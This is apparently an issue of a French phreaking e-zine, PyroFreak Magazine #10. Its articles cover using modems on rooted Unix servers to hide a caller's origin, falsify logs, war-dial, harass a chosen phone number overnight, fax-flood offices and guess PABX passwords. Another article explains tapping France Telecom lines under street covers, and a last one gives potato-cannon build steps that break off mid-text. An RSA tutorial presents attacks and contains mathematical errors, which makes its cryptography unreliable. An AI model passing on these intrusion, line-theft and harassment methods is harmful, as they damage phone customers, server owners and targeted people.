possible de dguiser notre adresse IP par des passerelles nous permet de 
faire notre travail sans avoir  falsifier notre appel modem. Par contre, 
lorsque nous devons entrer sur des rseaux internes (dial-in) ou faire de 
phone scanning, nous sommes en relation direct avec notre cible. Nous pouvons 
toujours enlever le call-back, mais on peut encore retracer l'appel. Il 
existe une varit de outdial qui permette de passer par une passerelle 
tlphonique sur des numros de tlphone (vmb,pabx). Je traiterais de cette 
article d'un forme de outdial peu connu, les outdial d'internet.


Il y a presqu'une dcennie, en pleine explosion des BBS et dans l'closion 
d'internet. On trouvait sur le net, des serveurs unix qui grce  leurs 
modems nous permettaient de faire des appels tlphoniques dans leur zone 
d'appel locale. On vitait ainsi de payer des frais d'appels interurbains. En 
se connectant sur le net et en passant par un modem de la cte ouest, nous 
pouvions aller sur un BBS de Vancouver avec un appel local. Sauf que depuis 
ce temps les BBS ne sont plus populaire et l'abus des serveurs qui offrait 
leurs modems, a fait disparatre ce service.


Priver d'un service lgitime, nous sommes obliger de le faire de faon 
illgitime. Car malgr les apparences, les modems connects au rseau ne sont 
pas disparus. Il nous faut les trouver o ils sont essentiel, c'est--dire 
dans les compagnies d'accs internet et utilisant des fax par un serveur 
unix. La difficult avec ces box, c'est qu'ils sont rare et ont trs souvent 
une scurit renforce. Une fois que nous avons trouver un serveur unix avec 
un modem, nous devons obligatoirement tre en root pour pouvoir l'utiliser. 
De plus, le serveur doit avoir un connexion de type "eth" ou connexion par 
cable. Si il n'a qu'un connexion en ppp et un seul modem, si l'on utilise le 
modem, le serveur serait automatiquement dconnect du net (et nous du 
serveur). Un fois toutes ces conditions remplies, le plaisir commence.


Nous pouvons en nous connectant via telnet appeler o nous voulons dans le 
monde.  l'aide de logiciel terminal comme minicom, nous nous connectons a 
des modems sur le rseau tlphonique. On peut seulement se connecter a
des carriers, oublier toutes les vocales. La source de l'appel est bien sur 
le serveur unix qui hberge le modem. Les appels locales se feront dans 
l'area dans laquelle se trouve le modem. Nous avons aussi la libert de faire 
des longues distances. Ils ne faut pas en abuser. A la fin du mois 
l'administrateur va sauter en voyant son bill de tlphone et notre 
plate-forme de hacking va s'teindre. Le serveur peut aussi tre utilis pour 
faire du phone scanning. On peut dissimuler en background un programme qui 
fait le travail par lui-mme. Certains gros serveur offrant accs  internet 
on parfois plus de 10 modems ! Imaginer quelques instant, un scan en shootgun 
avec 15 modems simultanment.

Un autre merveilleux service que peut nous rendre ce modem c'est d'tre 
compltement anonyme sur le net. Disons que tu call par une dizaine de pabx 
et de vmb outdial, mme si tu es trs anonyme, il reste que chaque appel 
venant de ton modem et des outdials est enregistrer. Avec les internet 
outdial, tu peux te connecter sur internet et aprs quelques passerelles, te 
connecter sur le serveur de outdial. Sur ce serveur tu peux ensuite te 
reconnecter sur internet ! Tu call un accs internet de type shell ou un 
provider qui offre telnet ou rlogin sans passer par le ppp. Il est toujours 
possible de marcher par pppd mais sa reste plus compliqu. Le gros avantage 
avec cette technique est que grce  notre root accs sur le serveur 
d'outdial nous pouvons effacer toute trace de notre source IP qui utilise le 
modem.

Route classique:

MODEM => PABX => PPP => PASSERELLE => CIBLE

Chaque connexions est enregistres.


Route avec internet outdial:

MODEM => PABX => PPP => PASSERELLE =>/ SERVEUR OUTDIAL => PABX => PPP
PHONE         => INTERNET                              => PHONE => INTERNET

Connexions entre la PASSERELLE et le SERVEUR OUDIAL peux tre facilement
anonyme en falsifiant les logs.

Ils existent milles et unes utilisation farfelu que l'on pourrait faire de 
ces modems. On pourrait sans trop de difficult se faire un petit script qui 
pourrait appeler  un numro prcis sans interruption.. On pourrait excuter 
se script pendant la nuit et le laisser agir en background. Le numro est  
votre discrtion. Vous pourriez paralyser le tlphone et offrir une nuit 
blanche  votre ennemi jur. Nous pourrions installer un BBS, une PABX, ou 
peut-tre un boite vocale sur ces modem, si nous somme assez chanceux pour 
capturer des modems vocales. Une avalanche de message fax pourrait inonder un 
bureau, grce  la puissance de nos fameux modems. Avec quelque effort en 
programmation, une dizaine de modems devinerais rapidement le password d'une 
PABX.

Le modem est le meilleur ami de l'homme. Plus l'homme en possde plus il est 
puissant. Pourquoi se restreindre a un seul ami ? tre populaire, n'est-il 
pas la cl du bonheur ? J'espre vous avoir convaincu que lorsqu'il s'agit de 
modem, cette affirmation est vraie...



 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 13-Beige Boxing - Que se cache t'il sous les plaques        
|                             FUCK TELECOM (Pour les Franais)
|(X) Phreak ( ) Hack ( ) Autres
'.__________Par Cyberdollar  ________ cyberdollar@caramail.com ______ ___


Ce sont des plaques de mtal de meme type que les plaques d'egouts qui 
mesurent environ 40x60 cm mais parfois ce sont des plaques beaucoup plus 
grandes (60x100) mais un moyen infaillible de les reconnaitre elles ont le 
logo de Fuck Telecom !!


a)OU LES TROUVER ?
On n'en trouve pas n'importe ou !! Si vous vous trouvez dans une rue et que 
vous vous voulez savoir immdiatement s'il y a des plaques FT dans cette rue 
: regardez en l'air : si vous voyez des cables en l'air alors vous n'en 
trouverez pas dans cette rue, si aucun poteau ou/et aucunes lignes ne sont 
suspendues en l'air alors vous trouverez trs certainement une/des plaque(s) 
FT dans cette rue : en effet s'il y a des plaques par terre ca veut dire que 
le rseau des lignes tlphoniques de FT est souterrain contrairement aux 
endroits ou vous verrez des lignes suspendues en l'air... je vous conseille 
de regarder dans les rues principales car ce sont les grandes rues dans 
lesquelles FT met les les cables sous terre, meme dans les petites villes  
(environ 3000 hab.) il y a les lignes sous terre mais uniquement dans la/les 
rue(s) principale(s) !!


b)QUE SE CACHE-T-IL DESSOUS ?
Avant de soulever plusieurs de ces plaques je m'attendaient a tomber sur un 
vritable rseau ou fils & cables s'emmleraient et je m'attendais meme  ne 
pas pouvoir m'y retrouver, mais une nuit  3h00 du matin dans un petit coin 
tranquille, lampe  la main, j'allais bientt trouver la rponse  tous mes 
problmes.......

Je soulevais donc la plaque : il y a quatre trous dans les plaques si vous 
tes seuls faites comme moi, passez un cable dans le premier trou faites le 
ressortir dans le deuxime, rentrer le dans le troisime, sortez-le du 
quatrieme et faites un noeud, de cette manire vous viterez de faire trop de 
bruit et en beige-boxing un peu de bruit = beaucoup d'ennuis !!

Si vous etes 2 mettez un doigt chacun dans chaque trou et soulevez mais je 
vous prviens : vous allez en chier !!

Voil, une fois le "coffre" ouvert je comtemplais le trsor, et l  ma 
grande surprise : il n'y a qu'un ou 2 fils !! Je le dnude dlicatement et l 
une petite dizaine de fils de toutes les couleurs s'entremelaient : je repre 
le bleu, puis le blanc : je les dnude branche mon tl et ses pinces crocos 
et l BINGO : j'ai la tonalit !!

Voil tout ceci juste pour vous dire qu'avec le rseau souterrain de FT plus 
besoin de dfoncer les boitiers ni de grimper en haut des potaux pour se 
faire un peu de BEIGE-BOXING !!

Faites-gaffe quand mme !!

 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 14-Encryption RSA                         
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Sabrina  ____ ________ sabrina@inorbit.com ______ ___





TCS - 2000

                                          Cr par Sabrina

KERCKHOFFS:" Il ne faut pas compter dans un cryptosystme dont la 
           rsistance rside dans le fait que l'ennemi ne sache pas comment
           fonctionne l'algorithme."



CRYPTOSYSTEME - RSA

I- PRESENTATION DU RSA

II- ALGORITHME DE CRYPTAGE RSA

     1- Principe fondamental

     2- Calcul d'un tripl ( N , C , D )

     3- Algorithme

III- RSA EN PRATIQUE

IV- CASSER LE RSA

     1- Comment casser le RSA

     2- Casser le RSA en utilisant les protocoles de communication: Partage 
        du module

     3 Cassage du RSA par factorisation du module N

     Mthode du crible quadratique

V- CONCLUSION SUR LE RSA

ANNEXE MATHEMATIQUES



=======================================================================




I - PRESENTATION DU RSA

 

La cryptographie  cl publique fut cre par Diffie et Hellman, et 
indpendamment par Merkle. L'originalit de cette dcouverte rside dans
l'existence de 2 cls: l'une pour crypter le message et la seconde pour le 
dcrypter. Les algorithmes qui en dcoulrent furent soit impraticables
(trop lent), soit trop gourmand en place (le message cod tait beaucoup 
plus grand que le message initial). Le premier algorithme intressant fut
celui de Merkle (algorithme  empilement) mais le RSA resta (et reste) le 
seul algorithme de cryptage vraiment sr et utilisable.

Le RSA est le plus connu des algorithmes  cl publique. Il est aussi bien 
utilis dans le chiffrement de donnes que dans les signatures
numriques. Invent par Ron Rivest, Adi Shamir et Leonard Adleman, le RSA 
rsiste depuis plusieurs dizaines d'annes  toutes les mthodes
de cryptanalyse ; mme en prenant en compte la puissance gigantesque 
dveloppe par les ordinateurs actuels. Sa scurit est contenue dans
la difficult  factoriser les grands nombres. En effet, il n'existe 
pas d'algorithme performant pour factoriser de tels nombres.

 

II- ALGORITHME DE CRYPTAGE RSA

     1- Principe fondamental

 

Le RSA est un cryptosystme  cl publique. Il y a en tous 3 cls. La 
premire est appele cl publique N, elle est connue de tous et est
divulgue librement. La seconde est la cl de cryptage C ; celle-ci est 
garde secrte par l'expditeur du message. Elle ne doit donc pas tre
divulgue. Enfin, on a la cl de dcryptage D ; elle aussi gard secrte, 
cette fois par le destinataire.

La combinaison des cls N et C permet de crypter le message. Tandis que la 
combinaison de cl D et N permet de dcrypter le message.


=============
Image1.gif
=============



L'avantage d'un tel systme est que mme connaissant une partie des donnes 
du problme (c'est--dire ici N), on ne peut dcoder ce message.
Mais comme nous le verrons par la suite, il existe des techniques qui 
connaissant N permettent de retrouver C et D.

 

     2- Calcul d'un tripl ( N , C , D )

 

Il est conseill d'avoir quelques notions en arithmtique avant de lire ce 
paragraphe. Ci-joint une annexe mathmatique rappelant les points principaux 
pour comprendre le RSA.


Soit p et q deux nombres premiers de grande taille (plusieurs centaines de 
chiffre en base 10). Au plus ces nombres seront grands au plus votre
cryptage sera fiable ; en contrepartie, le codage sera lent.


    N la cl publique vaut le produit p*q.

 C la cl de cryptage est choisie tel que C et (p-1)*(q-1) soient premiers 
entre eux.

 D la cl de dcryptage est choisit tel que D = C-1 MOD (p-1)(q-1)

On obtient ainsi un tripl solution. On remarquera que la donne de p et q 
permet de retrouver entirement la cl de cryptage C et de dcryptage
D. Pour casser un cryptage RSA, il suffira donc de retrouver p et q  partir 
de N (ce qui comme prvu dans l'introduction reviens  factoriser N).
Mais nous reviendrons sur ce point dans la section IV- 3.




     Exemple: Recherche d'un triplet solution

     On prend p et q deux nombres premiers: p = 53 et q = 17. On se 
restreint ici  des nombres de petite taille pour avoir des calculs
simples. On obtient donc d'aprs les explications prcdentes: N = p*q = 901

     On choisit la cl de cryptage C pour que C soit premier avec (p-1)*(q-
1). On peut prendre (le choix reste assez arbitraire) C = 83.
     Enfin, le calcul de D s'obtient en calculant la solution de C = 83-1 
mod 901 = 411. Attention ! En apparence les calculs peuvent sembler simple 
mais la programmation de gnrateur de cl ncessite de subtils algorithmes 
(cf Fin de l'Annexe). On obtient donc le tripl ( N , C , D ) = ( 901 , 83 , 
411 ).

 

     3- Algorithme

 

Si on considre un fichier informatique c:\command.com par exemple. Ce 
fichier est, informatiquement parlant, reprsent par une suite d'octet.
Or, chaque octet reprsente (dixit la table ASCII tendu) un numro compris 
entre 0 et 255. On peut donc, en juxtaposant tous les octets du
fichier, dire que c:\command.com est un nombre M (de trs grande taille).


On va tout d'abord sparer M en une succession d'entier Mi , tous plus petit 
que N:



==========
Image2.gif
==========



Cette hypothse (Mi plus petit ou gal  N) est TRES importante ; le RSA ne 
fonctionnera pas sinon. On peut maintenant appliquer l'algorithme de
cryptage RSA sur chacun de ces entiers Mi.



==========
Image3.gif
==========


 

On crypte bien M1 par les cls ( N , C ) et on dcrypte W1 par les cls ( N 
, D ). On retrouve ainsi le schma du cryptosystme  cl publique
voqu dans la prsentation. On remarque que W1 est infrieur ou gal  N 
(dt au calcul modulo N) ; le fichier crypt sera de mme taille que le
fichier en clair. Cette remarque prend toute son importance dans la 
pratique. On peut aussi remarquer que le codage du fichier se fait par Bloc 
de taille de longueur de N.


 
     Exemples: Cryptons le message M prcdent par le triplet trouv en 1-

     ( N , C , D ) = ( 901 , 83 , 411 ) et M = 330564019

     Cryptage:

          M1C mod N = 3 = W1

          M2C mod N = 469 = W2

          M3C mod N = 8 = W 

               D'o W = W1-W2-W3 = 003469008 ( donne crypte )

     Dcryptage:

          W1D mod N = 330 = M1

          W2D mod N = 564 = M2

          W3D mod N = 19 = M3

               On retrouve le message M = M1-M2-M3 = 330564019

 

III- RSA EN PRATIQUE

 

Dans la pratique, plusieurs utilisateurs possdent soit la cl C, soit la 
cl D. Comme vous l'avez sans doute remarqu, C et D joue des rles
totalement symtriques. Si bien que certains utilisateurs pourront utiliser 
D pour crypter leur message et d'autre pourront utiliser C pour le
dcrypter ...et vice versa.




==========
Image4.gif
==========



Par exemple, l'utilisateur 1 pourra envoyer et recevoir des messages des 
utilisateurs 2, 4 et 5. Tandis que l'utilisateur 2 pourra envoyer et 
recevoir des messages des utilisateurs 1, 5 et 6. Il y a donc bien un 
partage des cls. Bien sr, un tel systme s'appuie sur la confiance des 
utilisateurs avec lesquels les cls sont partages (problme de 
certification). Par ailleurs, la cl N est connu de tous, mme de vous. Un 
tel systme justifie bien le fait que C et D sont appels souvent cl priv


 

IV- CASSER LE RSA

     1- Comment casser le RSA

      

Si le RSA est encore actuellement utilis pour crypt des donnes trs 
importantes (cartes bancaires, compte en banques, virement boursier,
Microsoft Windows, netscape..), c'est parce qu'avant tout, il est trs 
difficile de le casser. Il existe cependant 2 grandes mthodes de cassage du
RSA. La premire est celle qui consiste  utiliser les 'vices de formes' des 
protocoles de transmission d'information (il faut garder  l'ide que le
RSA ncessite 3 cls ; on peut utiliser certaines astuces, par combinaison 
des cls, pour obtenir notre message en clair). La seconde mthode
est d'utiliser notre seule hypothse de dpart: N. Pour des raisons qui 
viendrons d'elles mme, nous nommerons ces algorithmes: attaque brut
(par analogie aux attaques brutes force sur serveur ftp ;)


 

2- Casser le RSA en utilisant les protocoles de communication: Partage du 
   module

 

Si l'on reprend la mthode de gnration des cls, il est facile de voir que 
pour une mme cl publique N ; il peut y avoir plusieurs cl priv C et
D. L'attaque suivante est valable lorsque vous connaissez N, C1 et C2, o C1 
et C2 reprsentent 2 cl prives bases sur le mme module N.
C'est--dire que les cls C1 et C2 ont taient cr  partir du mme nombre 
N.

On suppose ensuite que le message M clair a t crypt avec la cl C1 et 
avec la cl C2. On obtient 2 messages crypts W1 et W2.

                                          W1 = MC1 mod N

                                          W2 = MC2 mod N

On peut maintenant trs facilement dcrypter le message M initial. Pour 
cela, il suffit de trouver deux nombre a et b tel que:

                                           a*C1 + b*C2 = 1

On peut toujours supposer que a < 0 (sinon b l'est), on obtient dans ce cas: 
(W1-1)-a*W2s = M mod N et on rcupre donc le message en clair M.

Le cassage du RSA est presque immdiat s'il y a un partage des cls entre 
utilisateur. Il existe d'autres mthodes de cassage du RSA par
utilisation du protocole de transmission des cls, mais comme vous le voyez 
ces mthodes utilisent des hypothses trs fortes ! Et souvent ceux
qui utilisent le RSA en connaissent les failles. C'est l qu'interviennent 
les autres mthodes d'attaque brut du RSA.

 

     3 Cassage du RSA par factorisation du module N

      

Imaginons que l'on est rcupr le message W1 crypt par coutes de la ligne 
ou par vol du fichier crypt. Les cls de cryptage C et D ont t
trouv exclusivement  partir de p et q. On rappelle que N = p * q. Or, 
comme l'on connais N, il suffit donc de factoriser N pour rcuprer les
nombres p et q. La scurit du RSA rside donc exclusivement dans le fait de 
pouvoir factoriser N.

On pourrait dans un premier temps penser que factoriser N est une chose 
facile, car finalement, il suffit de tester (N divise A) pour toutes les
valeurs de A comprises entre 1 et N (on peut mme dire que A doit tre 
premier :). Mais le nombre N est, comme nous l'avons annonc dans la
II-2, d'une taille de plusieurs centaines de chiffres: aucuns ordinateur 
actuel n'est assez puissant pour calculer les divisons successives de N en
un temps raisonnable. Cette mthode d'attaque brut prendrait plusieurs 
sicles !!! Malgr les connaissances actuelles il n'existe pas de
d'algorithme permettant de factoriser N facilement..c'est d'ailleurs ce qui 
fait toute la force du RSA..

     Le RSA est incassable ?

Bien sr que non ! Les cryptanalystes ont trouv des mthodes permettant de 
factoriser N en un temps relativement raisonnable. On va tudier
ici une des ces mthodes. Mais il faut savoir avant tout que des telles 
mthodes de factorisation ncessite une excellente matrise des langages
de programmation car la moindre ligne de code gagn se paie par un temps de 
calcul parfois divis par 2. Il faut aussi savoir que casser une cl
RSA de 100 chiffres emploie une norme quantit de calcul, il faut donc 
plusieurs ordinateurs trs puissants.

Il existe actuellement 2 grandes mthodes de factorisation de N: la mthode 
des courbes elliptiques et celle du crible quadratique. La premire
est rsolument la plus difficile d'accs, c'est pourquoi nous allons tudier 
la seconde mthode

 

                                  Mthode du crible quadratique

                                                 

La mthode est bas sur l'ide trs simple suivante. On suppose connu X et Y 
tel que

                                  N divise X - Y = ( X-Y ) * ( X+Y )

On sait que N peut se factoriser sous la forme p*q. Donc, p et q divise N. 
Pour des raisons mathmatiques (videntes ?), on a p qui divise (X-Y)
ou (X+Y). Finalement, on cherche  calculer le plus grand diviseur commun de 
(N et X-Y) ou (N et X+Y). Ce qui revient  utiliser l'algorithme
d'Euclide du calcul d'un pgcd (plus grand diviseur commun).



     COMMENT DETERMINER X ET Y

Pour commencer, on dtermine une suite de carre (an) tel que

                                    |N-an| < d avec d un entier raisonnable

Par ailleurs, en utilisant l'unicit du dveloppement d'un nombre en facteur 
de nombre premier, on suppose connu des nombres premiers pi tel
que:

         |N-an|=P (pini) o pi est un 'petit' nombre premier


  (on entend par petit un nombre qui est parfaitement connu de la machine)

Ainsi, on peut toujours supposer pour simplifier que l'on dispose de a1, a2 
et a3 tel que:

                                        N-a1=p1n11*p2n21*p3n31

                                        N-a2=p1n12*p2n22*p3n32

                                        N-a3=p1n13*p2n23*p3n33

Maintenant, on recherche alors l 1, l 2 et l 3 tel que (N-a1)l1*(N-
a2)l2*(N-a3)l3=a 

Il s'agit en fait de rsoudre :

l 1 n11+l 2 n12+l 3 n13=0 mod 2

l 1 n21+l 2 n22+l 3 n23=0 mod 2 (problme de rsolution de systme dont on 
sait trouver des solutions)

l 1 n31+l 2 n32+l 3 n33=0 mod 2

on trouve donc les solutions: l 1=... ; l 2=... ; l 3=...  tel que (N-
a1)l1*(N-a2)l2*(N-a3)l3=a 

puis en utilisant les calculs de modulo on obtient: (a1l1*a2l1*a3l1) = a  
mod N

finalement en posant, X = a et Y = a1l1*a2l1*a3l1 on retrouve alors Y-X=0 
mod N

                      On a donc trouver X et Y pour que N | Y-X

 

     COMMENT DETERMINER LES pi ET ai ?

On se fixe tout d'abord une base de facteurs premiers {p1=2, p2=3, p3=5, 
p4=7, ...}. Ces entiers sont considrs comme des nombres premiers
'simples'. C'est--dire qu'ils sont par exemples calculables ou contenus 
dans une base de donne. On peut dcrire la recherche des entiers pi et
ai par l'algorithme suivant:

 On calcul : m=E( racine(N) ) ; on peut alors calculer les ai=(m+i) dont le 
carr est voisin de N.

                                             |N-an| < d 

 On fixe c ( le crible ) un entier naturel. On calcul le rsidu R avec

      R=N-(m+i) et on fait varier i dans des valeurs entires de -c  +c 

 On divise (tant que c'est possible) R par p1, p2,... pour obtenir une 
factorisation de R.

  On obtient une galit du type recherch : N-a1=p1n11*p2n21*p3n31*...

On pourrait croire que l'on factorise des nombres de grandes tailles en 
cherchant  factoriser N-a1. Mais en fait, il faut bien voir que les
nombres manipuls sont de l'ordre de racine(N) donc 2 fois plus petit (au 
niveau de la taille :) que N !

 

V- CONCLUSION SUR LE RSA

 

On comprend mieux pourquoi le RSA est l'un des algorithmes de cryptage les 
plus sr au monde. Il est relativement facile  implmenter, tandis
que les "casseurs de RSA" sont quant  eux trs coteux et trs dlicats  
coder. Par exemple, casser une cl de 140 a ncessit 200 ordinateurs
fonctionnant en parallle durant 4 semaines pour poser les systmes 
d'quations (celui des l prcdent) et 100 heures de calculs sur un CRAY
pour les rsoudre. Les crateurs du RSA ont toujours confiances en leur 
cryptosytme. Il organise d'ailleurs un norme concours de cassage du
RSA. Le but est de trouver les lments constitutifs du RSA ( p et q )  
partir de N. Actuellement (dbut 2000), on cherche  casser le RSA-155,
c'est--dire  155 chiffres. Les responsables du RSA Data Security 
recommandent d'utiliser des cls de plus en plus grandes car l'avancs des
technologies et des algorithmes permet de diminuer de jour en jour la dure 
de vie des cls existantes. Ces mme responsables mettent en garde
les industriels contre qui de grands groupes financiers ou organisation (NSA 
en premire ligne...) auraient les moyens de construire des
'super-calculateurs' pour dcrypter les donnes sensibles.


RSA-155 constitue une vritable tape dans la cryptographie. Car cod en 512 
bits, le RSA-155 est vritablement utilis par les banques... Le
cassage du RSA 155 remettra en cause la plus part des mthodes de cryptage 
des organismes. On estime  quelques mois le cassage du RSA
155. On sait hors et dj que le prochain challenge sera le RSA-160.

     Exemple de machine "casseuse de RSA":

     TWINKLE (cr en 1999) est le nom donn  la machine cens aid la 
factorisation des nombres premiers. Son crateur est Adi
     Shamir, il estime sa puissance de calcul quivalente  1000 Pc actuel 
(pour un cot de 30 000 Frs). Cette machine serait capable de
     casser des cls publiques de 512 bits (TWINKLE travaille  10 GHz).

     Le principe de cassage de cette machine consiste  trouver l'inverse 
d'un calcul modulaire. On a vu que W = MC mod N. Elle cherche des solutions 
de calcul de racine C-ime de W. C'est--dire les solutions envisageables de 
W-C = M mod N. Une tel mthode permettrai de factoriser un RSA-140 en 
environ 10 jours (d'aprs les crateurs) et un RSA-155 en  peine 10 
semaines....

     Voici  titre illustratif les prdictions d'une telle machine en 
ressource mmoire (chiffres pris de www.rsa.com)

Taille de la cl

        (en bits)
                Nombre de facteurs premiers
                    dj connue
                               Mmoire utilis
                                         Mmoire li
                                         aux quations
         428
                     600 ko
                                  14 Mo
                                          128 Mo
         465
                     1.2 Mo
                                  64 Mo
                                          825 Mo
         512
                     3 Mo
                                 128 Mo
                                           2 Go
         768
                     240 Mo
                                  10 Go
                                           160 Go
         1024
                     7.5 Go
                                  256 Go
                                           10 To !






                                 ANNEXE MATHEMATIQUES

 

Calcul Modulaire

A = B mod C quivaut  dire que B est le reste de la division euclidienne
de C par A. On lis A gale B modulo C.

     10 = 2 mod 8 car 10 = 1*8 + 2

     6 = 0 mod 3 car 6 = 2*3 + 0

 

Nombres premiers et premiers en eux

Un nombre est premier s'il est divisible seulement par 1 et par lui mme.
Les nombres premiers nous servent entre autres pour dterminer la cl
publique N.

     7 est premier car divisible seulement par 1 et par lui mme. 

Deux nombres sont premiers entre eux si le seul diviseur commun entre eux
est 1. Cela permet de calculer la cl de cryptage C.

     10 et 9 sont premiers entre eux. Car leurs seuls diviseurs commun est 
1: 10 = 2 * 5 et 9 = 3 * 3.

      

Deux nombres premiers entre eux ne sont pas forcement premiers eux mme !
Comme le montre l'exemple prcdent: 10 et 9 sont premiers entre
eux sans tre premiers.

REM: TOUT nombre entier est dcomposable en produit de nombres premiers.

     16473 = 3 * 17 * 19 (on dis que l'on a factoris 16473)

     8427 = 3 * 53

 

Inverse Modulo

B = A-1 mod C reviens  trouv un couple ( A , X ) tel que B*A + C*X = 1

     Comme 3*4 - 1*11 = 1, on a donc 3 = 4-1 mod 1

Il existe un thorme qui dis que si A et B sont premiers entre eux alors
on peut trouver U et V tel que: A*U + B*V = 1. Cela est important pour
calculer la cl D de dcryptage.

 

PGCD (plus grand diviseur commun)

Le pgcd reprsente le plus grand diviseur commun de deux nombre.

     pgcd ( 5 , 15 ) = 5 car 15 = 3 * 5

     pgcd ( 8 , 18 ) = 2 car 8 = 2 * 4 et 18 = 2 * 9

 

Algorithme d'Euclide

Il permet de rsoudre l'quation d'inconnu ( X , Y ): X * A + Y * B = 1 dans
le cas o pgcd( A , B ) = 1 (c'est--dire les cas o A et B sont premiers 
entre eux)

Si A = B mod C alors PGCD( A , B ) = PGCD ( B , C )

     Rsolution de X*123 + Y * 23 = 1

     123 = 5 * 23 + 8 donc ici 125 = 8 mod 23

     23 = 2 * 8 +7

     8 = 1*7 + 1


     d'o: 1 = 8 - 1 * 7 = 8 - 1* (23 - 2*8) = 3 * 8 - 23 = 3 * (123 - 5*23)
           - 23 = 3 * 123 - 16 * 23

     on a donc trouver une solution de l'quation: X*123 + Y * 23 = 1

Ces quations interviennent souvent pour le calcul de D, ou pour remonter 
le calcul des cls N, D et C.

 

Optimisation du calcul modulaire

Cette section n'est destine qu' ceux qui voudraient implanter sur machine
le RSA. Etant donn que les nombres manipuls sont de trs grandes tailles
(plusieurs centaines de chiffres). Il est impossible de reprsenter MC lors
du calcul de MC mod N. En effet, si M = 466345346434123423343463465645 et
C = 7876856745342352355645767856785634. Il est trs maladroit de calculer
MC en multipliant M, C fois et ensuite de calculer le modulo ( le nombre MC
reprsente un nombre de 1033 chiffres, c'est--dire 1 million de milliard de
milliard d'octet....). 

C'est pourquoi, on emploie plutt une mthode qui permet de calculer d'un
coup MC mod N. Pour comprendre cette algorithme, il faut juste savoir que
si A = B mod C et X = Y mod C alors A*X = B*Y mod C.

 

Explication de l'algorithme de calcul de MC mod N

     On dcompose C en base 2 comme suivant C=S ( d i 2i ) avec d i =0 ou 1

     Donc, MC=P Md i 2^i=Md 0 *(Md1)2*((Md2)2)2*(((Md3)2)2)2*...

     On calcul successivement : a i=(Mdi)2^i mod N et on aura
     alors MC=P (a i) mod N

Algorithme :

     La variable r contient la valeur P (a i) ; calculer au fur et  mesure.

     Tant que C>0

          Si (C mod 2)=1

          alors M*r mod N  r {Calcul de M^2^2^2^... mod N}

          C div 2  r {Dcomposition de C en base 2}

          M*M mod N  M {Calcul de M^2 mod N}

          Retourner r

                 

                       version 1.2 - 2000

Pour toutes questions, commentaires, critiques, erreurs: sabrina@inorbit.com





 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 15-Autres lments sur l'emetteur tl du #9                
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Cyberdollar  ________ cyberdollar@caramail.com ______ ___


Ayant trouv l'article de Skywalker sur l'emetteur TV trs bon j'ai essay 
(Cyberdollar) d'ajouter ce que je connaissais galement sur le sujet, disons 
que c'est un complment sur l'article de Skywalker mais tout le mrite lui 
revient !!


1) LES BRANCHEMENTS D'UNE PRISE PERITEL :
Ce truc ne sert pas  grand chose mais ce sont quelques-une de mes 
connaissances des prises peritel :


,-------------------------------------------,
\  20  18  16  14  12  10  08  06  04  02   |
 \                                          |
  |  19  17  15  13  11  09  07  05  03  01 |
  '------------21---------------------------'


1 Sortie Audio Droite 		2 Entre Audio Droite 
3 Sortie Audio Gauche 		4 Masse Audio 
5 Masse Bleu 			6 Entre Audio Gauche 
7 Entre Vido Bleu 		8 Entre Commutation lente ou status 16:9 
9 Masse Vert 			10 Non connect 
11 Entre Vido Vert 		12 non connect 
13 Entre Vido Rouge 		14 Masse commutation 
15 Entre Vido Rouge 		16 Entre Commutation rapide * 
17 Masse Sortie Vido 		18 Masse Entre Vido 
19 Sortie Vido 			20 Entre Vido 
21 Masse commune du blindage 

AUTRES FREQUENCES : 
Il existe une autre frequence que Skywalker n'a pas mis dans sa liste...
C'est un emmetteur frontalier susceptible d'tre recu  proximit de la 
frontire :
LUXEMBOURG : bande III (Contrairement  la bande U en France) TF1 : E7  - F2 : E21

Au passage.....faites gaffes : le risque zero n'existe pas !!


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 16-Le PATATOR
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Mastermind  ________ anakin_vador@hotmail.com ______ ___


1-Introduction
  Le patator est un canon en PVC projetant des pomme de terres ,ufs et 
petits suisses dans un rayon de 100 mtres  a l 'aide de butane , gaz 
utilis dans la plupart des arosols (laque, do)

Le Patator a t prsent en 1998 par Thierry Lhermitte sur la chane cble 
COMEDIE.

Le Patator n' est nullement un objet coteux et difficile a raliser, sa 
fabrication est tres simple et j'encourage quiconque a essayer. Son prix d' 
a peu prs 100 FF peut paratre cher mais la facilit d'utilisation et le 
fun procur en vaut largement la chandelle. Le patator est un sport vou a 
se developper pour les prochains jeux olympiques il est trs pratique (bien 
que peu portable ) mais garanti une une grande utilit, de plus il est 
presque incassable en raison du pvc solide le constituant.

2-Materiel a acheter en magasin de bricolage (batkor)

 -1 tube en pvc diamtre 100millimetre longueur 80 centimtre chambre de 
    combustion)
 -1 tube pvc diam. 40 ou 50 mm longueur de 0.4 m a 1m (canon)
 -2 manchons pvc diamtre intrieur 100mm
 -1 bouchon a vis diam. 100mm
 -	rducteur passant du diam. 100mm au diamtre 40 ou 50mm (comme le canon)
 - De la colle pvc
-	Du papier de verre
-	Quelque chose pour dgraisser (actone, alcool a brler , mir vaisselle)
-	Un bout de grille fine
-	Dispositif d'allumage (voir plus loin)
-	Pomme de terres (duh!)

3-Realisation

Avant collage le pvc doit tre ponc puis dgraiss
Coller des 2 cots de la chambre de combustion le pas de vis et le 
rducteur.


Le canon peut tre fix au rducteur par du velcro mais il peut tre mieux 
de ne pas le fixer au dbut ( cela fait fusible et empche l' explosion)
une grille peut tre ajoute pour empcher la pomme de terre de tomber dans 
la chambre de combustion.

  Le systme d' allumage est la chose la plus dure  faire fonctionner, on 
peut en distinguer plusieurs sortes (la porte du patator dpend directement 
de l' tanchit du trou d allumage):

a)	Allumage classique
Percer un trou de 8-10mm dans la chambre de combustion . a partir de la 
on peut allumer de 2 faons avec une mche (ficelle imprgne d' essence) 
mais cela n'est pas pratique et salit le patator.
Plus pratique est l'allumage via un allumeur a gaz a flamme (allumeur 
de gazinire, sorte de tige allonge avec un briquet au bout) mais faire 
attention a ne pas s 'allumer la gueule avec!

Malheureusement ces allumages laissent un trou non bouch ce qui diminue 
le rendement. La voie royale pour allumer le patator est:

b)	Allumage piezo lectrique
Tout simplement un dispositif destin a faire une tincelle (arc 
lectrique ) pour allumer des fourneaux ou briquets. Il existe une 
